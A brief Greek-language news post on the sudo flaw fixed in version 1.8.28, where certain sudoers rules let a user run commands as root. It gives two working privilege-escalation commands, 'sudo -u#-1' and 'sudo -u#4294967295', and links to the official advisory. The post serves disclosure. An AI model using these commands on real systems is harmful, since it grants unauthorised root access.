Ένα σφάλμα στο sudo σάς επιτρέπει να εκτελέσετε οποιοδήποτε εκτελέσιμο αρχείο ως root εάν το /etc/sudoers επιτρέπει την εκτέλεσή του από άλλους χρήστες και απαγορεύεται για root.
Η εκμετάλλευση του σφάλματος είναι πολύ απλή:
sudo -u#-1 id -u
ή:
sudo -u#4294967295 id -u
Το σφάλμα υπάρχει σε όλες τις εκδόσεις του sudo πριν από την 1.8.28
Λεπτομέρειες:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Πηγή: linux.org.ru